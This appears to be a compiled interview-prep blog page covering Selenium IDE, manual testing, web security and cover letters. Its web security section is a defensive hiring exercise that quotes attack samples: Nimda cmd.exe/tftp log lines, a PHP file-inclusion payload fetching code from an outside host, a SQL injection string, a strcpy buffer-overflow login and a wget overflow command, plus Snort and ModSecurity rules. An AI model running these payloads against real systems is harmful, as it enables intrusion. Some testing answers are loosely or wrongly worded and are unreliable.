3) To execute some statements in a loop based on the value returned by the element
37. How to capture bitmaps in Selenium?
Bitmaps are captured using the Selenium set of commands. There are two modes of capturing the bitmaps
1) Capture the bitmap for the entire page – it captures the browser main page area of AUT
2) Capture the bitmap for the screen shots – it captures the entire screen shot like the print scree that you give from your keyboard
Selenium doesn’t support bitmap capturing for an element on AUT.
38. Which are the commands used for capturing the bitmaps?
captureEntirePageScreenshot
Saves the entire contents of the current window canvas to a PNG file. Contrast this with the captureScreenshot command, which captures the contents of the OS viewport (i.e. whatever is currently being displayed on the monitor), and is implemented in the RC only. Currently this only works in Firefox when running in chrome mode, and in IE non-HTA using the EXPERIMENTAL “Snapsie” utility. The Firefox implementation is mostly borrowed from the Screengrab! Firefox extension. Please see captureEntirePageScreenshot for more details
captureEntirePageScreenshotAndWait
Saves the entire contents of the current window canvas to a PNG file. Contrast this with the captureScreenshot command, which captures the contents of the OS viewport (i.e. whatever is currently being displayed on the monitor), and is implemented in the RC only. Currently this only works in Firefox when running in chrome mode, and in IE non-HTA using the EXPERIMENTAL “Snapsie” utility. The Firefox implementation is mostly borrowed from the Screengrab! Firefox extension. Please see
captureEntirePageScreenshotAndWait for details.
Note: This command runs with only mozilla firefox when you run the tests from RC. Other browsers it will not support
39. What is the difference between captureEntirePageScreenshot and CaptureScreenShot?
captureEntirePageScreenshot
1. This captures the AUT web page only
2. This supports only mozilla firefox
3. Accepts two arguments. one is the file name to be saved and other argument is back ground color
CaptureScreenShot
1. This captures the System screen shot
2. This supports all the browsers when you run from Selenium RC
3. Accepts one argument. That is the file name to be saved.
40. How do you set user extensions in Selenium IDE?
1. Open user-extensions.js with an editor (Notepad, etc.); it’s found in the selenium\core\scripts folder. If it doesn’t exist, just create it.
2. If you need to, commit the user-extensions.js file (like if you use subversion).
3. Open Selenium IDE and choose the Options menu and then Options… from that menu.
4. Make sure the path to your user-extensions.js file is entered in the Selenium Core extensions field (like \selenium\core\scripts\user-extensions.js)
5. Press OK button on options
6. Restart the IDE to reflect your extensions.
Note: After reopen, Selenium IDE may show compilations errors if the user-extensions.js file has any syntax errors.
41. What are the limitations of Selenium IDE
The limitations of Selenium IDE are:
1) Selenium IDE uses only HTML language
2) Conditional or branching statements execution like using of if, select statements is not possible
3) Looping statements using is not possible directly in Selenium HTML language in ide
4) Reading from external files like .txt, .xls is not possible
5) Reading from the external databases is not possible with ide
6) Exceptional handling is not there
7) A neat formatted Reporting is not possible with ide
To eliminate the above issues we use Selenium RC
ValueLabs (Hyderabad) Manual Testing – Written test Questions and Answers
ValueLabs (Hyderabad) Manual Testing – Written test Questions and Answers
Time: 90 Minutes ( 25 Questions)
Value Labs Manual Testing – Written test Questions and Answers- Prepared By_Rakesh Hansalia
1) What is Composite Primary Key.
- A primary key can consist of one or more columns of a table. When two or more columns are used as a primary key, they are called a composite key. Each single column’s data can be duplicated but the combination values of these columns cannot be duplicated.
- For example, if you have a Student table and a Course table, and one student can select many courses and one course can be selected by many students, so this is a many-to-many relationship. So you need to create the third table to define the relationship, say it’s called StudentCourse. It is important to note that you only need the StudentID and CourseID in this table as a composite key. You do not need an extra identity ID column in this table to uniquely identifies each row because only having an ID column to uniquely identifies each row is not sufficient. It cannot prevent the same student selecting the same course from being inserted into this table.
2) Difference between Table and View
Views are essentially logical table-like structures populated on the fly by a given query. The results of a view query are not stored anywhere on disk and the view is recreated every time the query is executed. Materialized views are actual structures stored within the database and written to disk. They are updated based on the parameters defined when they are created.
view uses a query to pull data from the underlying tables.
A materialized view is a table on disk that contains the result set of a query.
3) Difference between ECP and BVA
If I say in one line then ECP doesn’t include the boundary values in class partitions e.g. If we have three classes of 1-20, 21-40 and 41-60 then ECP we are not including the values 1,20,21,40,41 and 60 whereas in BVA we include them also.
4) Difference between Testing Scenario and Test Case
Test case is a condition which is executed for expected output with predefined set of steps with known inputs. Generally a test case have
1) Precondition
2) Steps to execute
3) Input data
4) Expected output
5) Status (Pass/Fail)
Test Scenario is set of test cases. What it means, If you have to withdraw money from an ATM machine, then it is a scenario. But to withdraw money, you need to execute many test cases, needs to provide many inputs and you get many outputs and finally your money with receipt of transaction.
Test Scenario is ‘What to be tested’ and Test Case is ‘How to be tested’.
5) Explain V -model
6) High Priority test cases for ATM application
1. Machine is accepting ATM card
2. Machine is rejecting expired card
3. successful entry of PIN number
4. unsuccessful operation due to enter wrong PIN number 3 times
5. successful selection of language
6. successful selection of account type
7. unsuccessful operation due to invalid account type
8. successful selection of amount to be withdraw
9. successful withdrawal.
10. Expected message due to amount is greater than day limit
11. unsuccessful withdraw operation due to lack of money in ATM
12. Expected message due to amount to withdraw is greater than possible balance.
13. unsuccessful withdraw operation due to click cancel after insert card
14. Check ATM machine is able to print receipts
15. Withdraw amount should be in the multiples of 100
7) Different DDL and DML commands
Data Definition Language (also known as DDL) is a computer language used to define data structures [ALTER COMMENT DROP CREATE]
The most popular form of DML is the Structured Query Language (or SQL). This is a language used for databases, and is designed specifically for managing data in relational database management systems (or RDBMS) [UPDATE DELETE LOCK INSERT SELECT]
9) Is functional Testing and System testing Same?
I would say ..No it’s not same.
-System testing is nothing but testing of the application as whole,where as Functional testing is nothing but testing of the application functionality.
-System testing is one of the phases of testing in SDLC .
For Eg in typical V model in develeopement phase unit testing is performed, followed by integration test and when the software is ready it is deployed to QA environment to perform “system testing “.
System testing is end to end application testing.
Functional testing is the Type of testing. It means testing the various functionalities of the application (individual or integrated) Other type being Non functional.
In system testing phase both Functional and non functional testing is performed.
– Most people think Functional testing and System testing is same. But they differ slightly in that functional testing verifies a software by checking it against designed specification documents while system testing validates a software by checking it against the user requirements.
10) Bug live cycle states
- Open
- Fixed
- Closed
- Reopen
- Obsolete
http://www.software-pointers.com/en-configuration-tools.html
11) Tell me 3 different Software Configuration Management Tools
http://www.software-pointers.com/en-configuration-tools.html
I’ve used VSS( Visual SourceSafe from Miscrosoft) & Tortoise when I was in iGATE patni, Gandhingar.
12) difference between Bug,error,defect
Bug : It is found in the development environment before the product is shipped to the respective customer.
Error : It is the Deviation from actual and the expected value.
Defect : It is found in the product itself after it is shipped to the respective customer.
13) What are the test deliverable in SDLC, when to deliver what doc?
Test cases Documents
Test Plan
Testing Strategy
Test Scripts
Test Data
Test Trace-ability Matrix
Test Results/reports
Test summary report
Install/config guides
Defect Report
Release notes
14) Tell me the concepts present in Test plan.
Refer this link : https://rakeshhansalia.wordpress.com/2012/05/14/test-plan-preparation-for-manual-testing/
15) What are the main issues found in Browser Comparability testing.
Alignment issues, JS errors, Image display problems, Ajax issue
16) bug life cycle
New Bug found > QA log a bug (Open State) > DEV Fix a big (Fixed State) > QA test it (Closed if ok or Reopen it if fails)
17)which is test case optimization method
1)BVA 2) functional testing 3) incremental testing 4) big band
Ans: BVA ( Boundary value Analysis)
18) difference between the delete and truncate command
ü Delete and Truncate both are logged operation. But DELETE is a logged operation on a per row basis and TRUNCATE logs the de allocation of the data pages in which the data exists. You can’t rollback data in TRUNCATE but in DELETE you can rollback data. TRUNCATE removes(delete) the record permanently.
ü You cannot TRUNCATE a table that has any foreign key
constraints. You will have to remove the constraints, TRUNCATE the
table, and reapply the constraints.
19) integration testing would done after system testing
a) true b) false
Ans: False
20) what is static method
There are two types of methods.
- Instance methods are associated with an object and use the instance variables of that object. This is the default.
- Static methods use no instance variables of any object of the class they are defined in. If you define a method to be static, you will be given a rude message by the compiler if you try to access any instance variables. You can access static variables, but except for constants, this is unusual. Static methods typically take all they data from parameters and compute something from those parameters, with no reference to variables. This is typical of methods which do some kind of generic calculation. A good example of this are the many utility methods in the predefined Math class.
All the Best Yaarooooooo J
Web Security Interview Questions
Web Security Interview Questions
The goal of this document is to provide appropriate questions for HR/Managers to pose to individuals who are applying for web security related positions. These questions do not have right or wrong answers, but rather spark relevant conversation between the applicant and the hiring staff.
Entry Level Questions
- 1. What do you see as the most critical and current threats effecting Internet accessible websites?
Goal of question – To gauge the applicant’s knowledge of current web related threats. Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics. Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).
- 2. What online resources do you use to keep abreast of web security issues? Can you give an example of a recent web security vulnerability or threat?
Goal of question – Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT. Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or applications, which are in wide use (awstats scripts) are acceptable.
- What do you see as challenges to successfully deploying/monitoring web intrusion detection?
Goal of question – We are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as:
- Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP)
- Proper logging – increasing the verboseness of logging (Mod_Security audit_log)
- Remote Centralized Logging
- Alerting Mechanisms
- Updating Signatures/Policies
- What is your definition of the term “Cross-Site Scripting”? What is the potential impact to servers and clients?
Goal of question –This question will determine if the applicant is well versed in the terminology used in web security. The applicant needs to be able to articulate highly technological topics to a wide audience. The second question will help to verify that the applicant fully understands how XSS attacks work and the impact to client information. WASC has a web security glossary of terms that may be of help – http://www.webappsec.org/glossary.html
Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site to echo client-supplied data, which execute in a user’s web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). XSS attacks do not typically directly target the web server or application, but are rather aimed at the client. The web server is merely used as a conduit for the XSS data to be presented to the end client. See also “Client-Side Scripting”.
- What are the most important steps you would recommend for securing a new web server? Web application?
Goal of question – Once again, there is no right or wrong answer, however we are interested in what the applicant views as important.
Web Server Security:
- Update/Patch the web server software
- Minimize the server functionality – disable extra modules
- Delete default data/scripts
- Increase logging verboseness
- Update Permissions/Ownership of files
Web Application Security:
- Make sure Input Validation is enforced within the code – Security QA testing
- Configured to display generic error messages
- Implement a software security policy
- Remove or protect hidden files and directories
Advanced Level Questions
- 1. Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?
68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/ cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 – – [09/Mar/2004:22:23:48 -0500] “GET /c/winnt/system32/
cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0” 200 566 “-” “-”
Goal of question – To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.
If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
You could use either Microsoft’s Internet and Security Acceleration (ISA) server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.
- 2. You are engaged in a penetration-test where you are attempting to gain access to a protected location. You are presented with this login screen:
What are some examples of you how you would attempt to gain access?
Goal of question – Determine if the applicant has a wide knowledge of different authentication vulnerabilities. They may attempt default usernames/passwords or attempt SQL Injection queries that provide an SQL true statement (such as – ‘ OR 1=1#). If they provide SQL examples, then offer them the following Error document information and ask them what this indicates.
| ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near ‘=’.
Data Source = “ECommerceTheArchSupport2” SQL = “SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId =” The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm
The specific sequence of files included or processed is: |
This error message indicates that the target web application if running Microsoft SQL and discloses directory structures.
- 3. What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?
========================================
Request: 200.158.8.207 – – [09/Oct/2004:19:40:46 –0400] “POST /index.php HTTP/1.1” 403 743
Handler: cgi-script
—————————————-
POST /index.php HTTP/1.1
Host: http://www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match “uname\x20-a” at POST_PAYLOAD
mod_security-action: 403
65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
Goal of question – to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:
- The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the “uname –a” data in the POST PAYLOAD.
- The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon “;” between the ls and uname commands. The target host would fail to execute the “lsuname” command.
- 4. One of your web servers is logging multiple requests similar to the following:
201.1.199.155 – – [26/Dec/2004:01:55:48 -0500] “PUT /hacked.htm HTTP/1.0” 403 769 “Microsoft Data Access Internet Publishing Provider DAV 1.1” “-“
What does this log entry indicate? How could you identify what the contents are of the “hacked.htm” file that the attacker is trying to upload?
Goal of question – Determine if the applicant can identify both the attack (a web defacement attempt using the HTTP PUT Method), as well as, the logging limitations of CLF. In this type of attack, the defacement text is sent in the request body and not on the URL Request line. In order to identify this data, a network sniffing application would need to be utilized. An application such as Snort could be used with a custom rule to identify this activity. Here is an example rule –
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:”LOCAL Put attempt”; flow:to_server,established; tag:session,50,packets; pcre:”/^PUT /A”; sid:3000001; rev:1;)
- 5. You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called “logon_validate” and a typical logon request looks like this –
“GET /cgi-bin/logon_validate?login=test&password=test”
The source code is shown below –
| void show_error(void) {
// AUTHENTICATION ERROR
exit(-1);
}
int main(int argc, char **argv) { char error_on_auth=’1′; char user[128]; char pass[128]; char *ch_ptr_begin; char *ch_ptr_end;
/**********************************/ /* Get Username from Query String */ /**********************************/ ch_ptr_begin=(char *)strstr(****QUERY_STRING****,”login=”); if (ch_ptr_begin==NULL) show_error(); ch_ptr_begin+=6; ch_ptr_end=(char *)strstr(ch_ptr_begin,”&”); if (ch_ptr_end==NULL) show_error(); *(ch_ptr_end++)=”; strcpy(user,ch_ptr_begin);
/**********************************/ /* Get Password from Query String */ /**********************************/ ch_ptr_begin=(char *)strstr(ch_ptr_end,”password=”); if (ch_ptr_begin==NULL) show_error(); ch_ptr_begin+=9; ch_ptr_end=(char *)strstr(ch_ptr_begin,”&”); if (ch_ptr_end!=NULL) *(ch_ptr_end++)=”; strcpy(pass,ch_ptr_begin);
if ((strcmp(user,GOOD_USER)==0) && (strcmp(pass,GOOD_PASS)==0)) error_on_auth=’0′;
if (error_on_auth==’0′) {
// AUTHENTICATION OK!!
} else {
// AUTHENTICATION ERROR show_error();
}
// return(0); hehe could be evil ;PPPPP exit(0);
}
|
This pseudo-code is taken from the NGSec Web Auth Games http://quiz.ngsec.biz:8080/game1/level6/replicant.php
Do you see any problems with this script? How could an attacker exploit this script to bypass the authentication mechanisms in this script? What are some mitigation options?
Goal of question – This is most likely the most complex question being asked during the interview due to the fact that the applicant will need to apply multiple layers of analysis, including both the attacker and defender perspectives.
Reference “Smashing The Stack For Fun And Profit” for technical details –
http://www.phrack.org/phrack/49/P49-14
The security issue with this script has to do with a buffer overflow problem in the way that the script is using the “error_on_auth” condition. The error_on_auth condition is initially declared to be “1” which means that he user is not authenticated. The “user” condition was declared directly after the error_on_auth and has been allocated 128 bytes. Due to the ordering of the declaration of the error_on_auth and user parameters, they occupy adjacent locations on the running stack. The result is that if the attacker submits a username that is 129 bytes (with the last byte being “0”), they can overwrite the error_on_auth data. A Unix command such as the following would achieve this goal –
http://www.companyx.com/cgi-bin/validate_logon?logon=000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
or
# wget http://www.companyx.com/cgi-bin/validate_logon?logon=`perl -e print "0"x129`
Mitigation options include the following:
- Update the validate_logon soruce code to fix the problem, such as using strncpy() instead of strcpy ().
- If the source code could not be updated, then security filters would need to be implemented on the web server.
- Using Mod_Security, you could implement some security filters for the “validate_logon” URL such as these:
- Only allow letters in the username argument. This would prevent the client from overwriting the error_on_auth data with a zero.
<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN “!^[a-zA-Z]”
</Location>
- You could also add another rule to restrict the size of the username/password arguments to be less then 129 characters.
<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN “!^[a-zA-Z]”
SecFilterSelective ARG_LOGIN|ARG_PASSWORD “.{129,}”
</Location>
A web application firewall (WAF) device could be implemented on the network to protect the entire web site. These devices have positive policy capability that should identify these types of attacks as “anomalous” and deny them. A brief listing of WAF vendors include Teros, Netcontiuum, Imperva, Watchfire, Breach, Axiliance, and others.
Software Testing general Interview Questions
Q1. Different between error, bug, defect, fault, failure?
Error: Errors are basically the deviation from the requirement, caught by testers and caused by misunderstanding of the Developers. Other words u can say coding problem or problem caused due to wrong coding practice.
Bug: If the Error found by testers are accepted as error by Developers. Then the error will called Bug. Either it should be functional or load.
Defect: Suppose any product/software is currently running as a beta version in the market/client side. Any issue currently caught in that application that are deviating the actual result from the requirement, will take as Defect.
Fault: When the product/software successfully launched in the market and running properly but due to any reason if it works unexpectedly is called Fault.
Failure: If the product fails to full fill the requirement, then it is called Failure.
Q2. What is validation and verification?
Validation: Better known as testing and the process includes: System testing System Integration testing Sub System Integration testing. Unit testing. Black box testing will be used in the validate…
Verification:-conducting reviews on documents like BRS, SRS, HLDS, and LLDS……called as Verification Validation:-executing the test cases and observing whether actual result is equal to expected result…
Q3. Explain Software test lifecycle?
STLC basically contains of five stages : 1) Planning and control 2) Analysis and Design 3) Implementation and Execution 4) Evaluating Exit criteria and Reporting 5) Test Closure.
In other words u can also say that Requirement gathering, test design, test plan, and Bug reporting, regression testing and closer. And explain briefly each and every step.
Q4. Explain buglife cycle?
New, open, assigned, fixed reopen and closed.
New when tester raises the bug the status should be new.
Open if the bug is genuine the lead should change the status open
Assign Assign to the developer
Fixed Developer fixed the bug and changes the status as fixed.
Reopen after regression or retesting tester will decide bug is closed or reopen.
Closed fixed by developer and tester review and closed.
Q5. What is software Testing Methodologies?
These are some of the commonly used test methodologies:
1. Waterfall model
2. V model
3. Spiral model
4. Rational Unified Process (RUP)
5. Agile model
6. Rapid Application Development (RAD)
Explain anyone which ur current company follows..
Q6. What is traceability matrix?
Traceability matrix is a document in which we map the test cases with the requirements. In general we check whether the application works as per requirements or whether we had covered all the required functionality through test cases.
Q7. What is performance testing?
Performance testing is the testing, which is performed, to ascertain how the components of a system are performing, given a particular situation. Resource usage, scalability and reliability of the product are also validated under this testing. This testing is the subset of performance engineering, which is focused on addressing performance issues in the design and architecture of software product.
Q8. Different kind of testing performed in mobile application testing?
Functional testing – This type of testing ignores the internal parts and focus on the output is as per requirement or not. Black-box type testing geared to functional requirements of an application.
System testing – Entire system is tested as per the requirements. Black-box type testing that is based on overall requirements specifications, covers all combined parts of a system.
Incremental integration testing – Bottom up approach for testing i.e continuous testing of an application as new functionality is added; Application functionality and modules should be independent enough to test separately. done by programmers or by testers.
End-to-end testing – Similar to system testing, involves testing of a complete application environment in a situation that mimics real-world use, such as interacting with a database, using network communications, or interacting with other hardware, applications, or systems if appropriate.
Acceptance testing -Normally this type of testing is done to verify if system meets the customer specified requirements. User or customer does this testing to determine whether to accept application.
Usability testing – User-friendliness check. Application flow is tested, Can new user understand the application easily, Proper help documented whenever user stuck at any point. Basically system navigation is checked in this testing.
Install/uninstall testing – Tested for full, partial, or upgrade install/uninstall processes on different operating systems under different hardware, software environment
Compatibility testing – Testing how well software performs in a particular hardware/software/operating system/network environment and different combination s of above.
Recovery testing – Testing how well a system recovers from crashes, hardware failures, or other catastrophic problems.
What is test plan?
A test plan can be defined as a document describing the scope, approach, resources, and schedule of intended testing activities.
It identifies test items, the features to be tested, the testing tasks, who will do each task, and any risks requiring contingency planning.
In other word u can say Test plan is a strategic document in order to do testing. it consists of test plan id, reference documents, Revision history, Test schedules, Test Item, Test process, Resources, Risks and mitigations, Training.. of info..
What is test case?
Test Cases are the implementation of a test case design which will help the software tester to detect defects in the application or the system being tested. This should be the primary goal of any test case or set of test cases. When I write a test case, I think of both types of test cases, positive test cases and negative test cases. Positive test cases are those which execute the happy path in the application and make sure that the happy path is working fine. Negative test cases as the name suggests are destructive test cases which are documented with some out-of-box thinking to break the system.
In other word u can say a test case is a document that describes an input, action, or event and an expected response, to determine if a feature of an application is working correctly. A test case should contain particulars such as test case identifier, test case name, objective, test conditions/setup, input data requirements, steps, and expected results.
What is End-to-End testing?
Testing a complete application environment in a situation that mimics real-world use, such as interacting with a database, using network communications, or interacting with other hardware, applications, or systems if appropriate.
What is the difference between re-testing and regression testing?
Retesting: Testing the same test cases in same build with different inputs…
Regression Testing: Attempts to verify that the application work as specified even after the enhancements done/bug fixes made to it.
What is test coverage?
Test coverage measures in some specific way the amount of testing performed by a set of tests (derived in some other way, e.g. using specification-based techniques). Wherever we can count things and can tell whether or not each of those things has been tested by some test, then we can measure coverage.
1. What are our primary objectives for a tool?
2. Describe the organizations development and testing process / methodology.
3. What type(s) of testing are we doing currently?
4. What tools do we currently own / maintain? (Purchased and Homegrown)
5. What language(s) is our application developed in?
6. Is the application web or browser based? If so, which browsers and versions do we test on.
7. What operating systems do we test on?
8. Are there any third party controls or grids?
9. Are there any Active X controls?
10. Do we need to test server side com objects or other parts of our application not accessed by a GUI?
11. Describe the application architecture?
12. What is the communication protocol between the different tiers of the application?
13. What databases does our application work with?
14. How do we create our test data?
15. Are we trying to validate data in the GUI or the back end database or both?
16. How often does our group test new builds of applications?
17. Do we have a dedicated Test Lab or would testers be using their own desktops?
18. What amount of money are we budgeting for this project / tool?
Why I will hire u?
I think that I am best suitable for this job. I am an efficient team player when a team work is concerned and if I am supposed to complete a task in a particular time then I am able to work individually and effectively to meet the deadlines. I can deal with the things effectively under pressure. And also, I am optimistic, hardworking, self-motivated, detailed oriented, well organized person. So, these qualities make me suitable to this job.
How to write Basic Cover latter
Basic cover letter
This paragraph, mention the source of the job vacancy, introduce yourself to the potential employer, mention how you suit the job profile, and make the employer aware of the attached resume. An employer has to take a decision based on just one paragraph, whether you should be called for an interview or not. So, you need to be very careful while writing a basic cover letter.
Even though a basic cover letter needs to be short and precise, you should not skip any important details that are essential for an employer to know. If you sacrifice any important information for the sake of the format, you might sacrifice your chance of getting an interview call. So, always remember that though short, you should be precise and to the point while writing your basic cover letter.
Example of cover letter:
I am interested in the Test lead position advertised in XXXX. I am currently employed as sr. software test engineer in YYYY Company.
Write some roles and responsibilities of your current company in second paragraph
To further acquaint you with the specifics of my background I am enclosing my resume. I hope you will consider me for this position. I look forward to meeting with you and discussing my qualifications in more detail.
Sincerely,
RakeshHansalia's Blog 